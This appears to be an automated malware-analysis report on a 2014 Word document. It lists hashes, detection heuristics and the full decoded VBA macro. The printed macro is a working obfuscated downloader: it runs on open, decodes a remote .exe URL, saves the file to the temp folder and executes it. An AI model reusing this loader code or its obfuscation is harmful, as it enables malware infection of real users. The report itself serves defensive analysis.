Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 4d7c6a2e9e5b9634…

MALICIOUS

Office (OLE)

37.5 KB Created: 2014-12-08 20:39:00 Authoring application: Microsoft Office Word First seen: 2015-01-04
MD5: 38368ef451cbe4120f427e4b79405c6c SHA-1: 78794c541247404e1348218b3a5bc8e867a9bc0d SHA-256: 4d7c6a2e9e5b963470cae32ce12f47a608c9477ec7d4b07861f639d15ff35a38
386 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The sample contains a VBA macro that is obfuscated and uses a loop structure to hide its execution. The macro calls the URLDownloadToFileA API, indicating an intent to download a second-stage payload. This is further supported by the 'Doc.Downloader.Macr-1' ClamAV detection and the critical heuristic firings related to obfuscated auto-exec loaders and URL downloading.

Heuristics 12

  • ClamAV: Doc.Downloader.Macr-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Macr-1
  • Reference to URLDownloadToFile API critical SC_STR_URLDOWNLOAD
    Reference to URLDownloadToFile API
  • VBA macros detected medium 7 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • URLDownloadToFile in VBA critical OLE_VBA_DOWNLOAD
    URLDownloadToFile in VBA
    Matched line in script
        Private Declare PtrSafe Function URLDownloadToFileA Lib "urlmon" (ByVal NRTMLM As Long, _
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
    Matched line in script
        Set fdfgdfeer4gf = CreateObject(HexToString("5368656C6C2E4170706C69636174696F6E"))
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
        Set fdfgdfeer4gf = CreateObject(HexToString("5368656C6C2E4170706C69636174696F6E"))
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Sub Workbook_Open()
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
        pPPhujkfg = Environ(HexToString("54454D50")) & HexToString("5C3156324D555932585759534658512E657865")
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5817 bytes
SHA-256: 6479fcee0bca15eb04606e1d901adda4599aa8b548ff88118b9a0ab1c49ad125
Detection
ClamAV: No threats found
Obfuscation or payload: likely
62 of 100 identifiers look randomly generated (e.g. 'pJIBidfsdfgF') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
#If Win64 Then
    Private Declare PtrSafe Function URLDownloadToFileA Lib "urlmon" (ByVal NRTMLM As Long, _
ByVal UUQCES As String, ByVal VKDDKH As String, ByVal XXRYIY As Long, _
ByVal RPBFSI As Long) As Long
#Else
    Private Declare Function URLDownloadToFileA Lib "urlmon" (ByVal NRTMLM As Long, _
ByVal UUQCES As String, ByVal VKDDKH As String, ByVal XXRYIY As Long, _
ByVal RPBFSI As Long) As Long
#End If



Sub pJIBidfsdfgF()
Dim eEvLrfmk As Integer
For eEvLrfmk = 0 To 3
Dim baWfWDze As Integer
For baWfWDze = 0 To 7
Dim SAYgiaqO As Integer
For SAYgiaqO = 0 To 3
DoEvents
Next SAYgiaqO
DoEvents
Next baWfWDze
Dim YqYhypAo As Integer
For YqYhypAo = 0 To 4
DoEvents
Next YqYhypAo
DoEvents
Next eEvLrfmk
Dim EEVzDOFd As Integer
For EEVzDOFd = 0 To 7
Dim zPXimGvf As Integer
For zPXimGvf = 0 To 8
DoEvents
Next zPXimGvf
DoEvents
Next EEVzDOFd
Dim pLIoZUak As Integer
For pLIoZUak = 0 To 9
DoEvents
Next pLIoZUak
dfgfdYUHKJ
End Sub
Sub AutoOpen()
Dim EbjbQDPq As Integer
For EbjbQDPq = 0 To 4
Dim CdllBhov As Integer
For CdllBhov = 0 To 7
Dim PQHZWtCI As Integer
For PQHZWtCI = 0 To 9
DoEvents
Next PQHZWtCI
DoEvents
Next CdllBhov
Dim kCQNamsp As Integer
For kCQNamsp = 0 To 5
DoEvents
Next kCQNamsp
DoEvents
Next EbjbQDPq
Dim twymuiQZ As Integer
For twymuiQZ = 0 To 9
Dim gdlbxxrS As Integer
For gdlbxxrS = 0 To 5
DoEvents
Next gdlbxxrS
DoEvents
Next twymuiQZ
Dim wwtnRgYJ As Integer
For wwtnRgYJ = 0 To 6
DoEvents
Next wwtnRgYJ
    pJIBidfsdfgF
End Sub
Sub Workbook_Open()
Dim lSDSjaIX As Integer
For lSDSjaIX = 0 To 5
Dim sTDHWGDR As Integer
For sTDHWGDR = 0 To 4
Dim sRKbXAsB As Integer
For sRKbXAsB = 0 To 8
DoEvents
Next sRKbXAsB
DoEvents
Next sTDHWGDR
Dim tkwqbUkk As Integer
For tkwqbUkk = 0 To 6
DoEvents
Next tkwqbUkk
DoEvents
Next lSDSjaIX
Dim lFnJrYhI As Integer
For lFnJrYhI = 0 To 5
Dim TlJYcqhc As Integer
For TlJYcqhc = 0 To 4
DoEvents
Next TlJYcqhc
DoEvents
Next lFnJrYhI
Dim vumjzjmH As Integer
For vumjzjmH = 0 To 3
DoEvents
Next vumjzjmH
    pJIBidfsdfgF
End Sub
Sub dfgfdYUHKJ()
Dim OLyhOPhV As Integer
For OLyhOPhV = 0 To 5
Dim ggfGxPRk As Integer
For ggfGxPRk = 0 To 1
Dim ZPjYCgvP As Integer
For ZPjYCgvP = 0 To 9
DoEvents
Next ZPjYCgvP
DoEvents
Next ggfGxPRk
Dim OLrUtuaF As Integer
For OLrUtuaF = 0 To 8
DoEvents
Next OLrUtuaF
DoEvents
Next OLyhOPhV
Dim lJjEgYjA As Integer
For lJjEgYjA = 0 To 2
Dim WbfHdOwR As Integer
For WbfHdOwR = 0 To 1
DoEvents
Next WbfHdOwR
DoEvents
Next lJjEgYjA
Dim RvlvZBKy As Integer
For RvlvZBKy = 0 To 7
DoEvents
Next RvlvZBKy
    ioHBKJdg = HexToString("687474703A2F2F4C69636874626C69636B2D74696572652E64652F6A732F62696E2E657865")

Dim RxEAjGVp As Integer
For RxEAjGVp = 0 To 1
Dim CgfDTtIw As Integer
For CgfDTtIw = 0 To 4
Dim FgQeLJJU As Integer
For FgQeLJJU = 0 To 6
DoEvents
Next FgQeLJJU
DoEvents
Next CgfDTtIw
Dim mUycLsvf As Integer
For mUycLsvf = 0 To 2
DoEvents
Next mUycLsvf
DoEvents
Next RxEAjGVp
Dim HzKcpqDF As Integer
For HzKcpqDF = 0 To 3
Dim OMaGEVHE As Integer
For OMaGEVHE = 0 To 3
DoEvents
Next OMaGEVHE
DoEvents
Next HzKcpqDF
Dim lLycLgdt As Integer
For lLycLgdt = 0 To 2
DoEvents
Next lLycLgdt
    pPPhujkfg = Environ(HexToString("54454D50")) & HexToString("5C3156324D555932585759534658512E657865")
Dim DworZYei As Integer
For DworZYei = 0 To 6
Dim upqzZMmH As Integer
For upqzZMmH = 0 To 7
Dim HrUkDKOk As Integer
For HrUkDKOk = 0 To 1
DoEvents
Next HrUkDKOk
DoEvents
Next upqzZMmH
Dim sEVeUqFO As Integer
For sEVeUqFO = 0 To 7
DoEvents
Next sEVeUqFO
DoEvents
Next DworZYei
Dim DxzQCjfE As Integer
For DxzQCjfE = 0 To 6
Dim NNAFobqA As Integer
For NNAFobqA = 0 To 5
DoEvents
Next NNAFobqA
DoEvents
Next DxzQCjfE
Dim IBTxvGUe As Integer
For IBTxvGUe = 0 To 8
DoEvents
Next IBTxvGUe
    R = URLDownloadToFileA(0&, ioHBKJdg, pPPhujkfg, 0&, 0&)
Dim QThZvUng As Integer
For QThZvUng = 0 To 2
Dim jBETMSlj As Integer
For jBETMSlj = 0 To 5
Dim pHJEOhLq As Integer
For pHJEOhLq = 0 To 1
DoEvents
Next pHJEOhLq
DoEvents
Next jBETMSlj
Dim kMNMqpIw As Integer
For kMNMqpIw = 0 To 2
DoEvents
Next kMNMqpIw
DoEvents
Next QThZvUng
Dim qDujcKvO As Integer
For qDujcKvO = 0 To 4
Dim WZeUslhK As Integer
For WZeUslhK = 0 To 7
DoEvents
Next WZeUslhK
DoEvents
Next qDujcKvO
Dim zQGIlsKX As Integer
For zQGIlsKX = 0 To 8
DoEvents
Next zQGIlsKX
    Set fdfgdfeer4gf = CreateObject(HexToString("5368656C6C2E4170706C69636174696F6E"))
fdfgdfeer4gf.Open pPPhujkfg
End Sub

Public Function HexToString(ByVal jYsjanx As String) As String
Dim gTFhDP As String
Dim LdOSt As String
Dim eYqnKg As Long
For eYqnKg = 1 To Len(jYsjanx) Step 2
Dim KznwAUrB As Integer
For KznwAUrB = 0 To 7
Dim CcuMacGs As Integer
For CcuMacGs = 0 To 7
DoEvents
Next CcuMacGs
DoEvents
Next KznwAUrB
Dim tYMWohkh As Integer
For tYMWohkh = 0 To 9
DoEvents
Next tYMWohkh
gTFhDP = Chr$(Val(Chr$(38) & Chr$(72) & Mid$(jYsjanx, eYqnKg, 2)))
Dim HdUMvIny As Integer
For HdUMvIny = 0 To 1
Dim kiZssepc As Integer
For kiZssepc = 0 To 5
DoEvents
Next kiZssepc
DoEvents
Next HdUMvIny
Dim sHZspsnX As Integer
For sHZspsnX = 0 To 7
DoEvents
Next sHZspsnX
LdOSt = LdOSt & gTFhDP
Next eYqnKg
Dim MFPIjRfh As Integer
For MFPIjRfh = 0 To 4
Dim xAlzqaHp As Integer
For xAlzqaHp = 0 To 8
DoEvents
Next xAlzqaHp
DoEvents
Next MFPIjRfh
Dim EPtelKlg As Integer
For EPtelKlg = 0 To 7
DoEvents
Next EPtelKlg
HexToString = LdOSt
End Function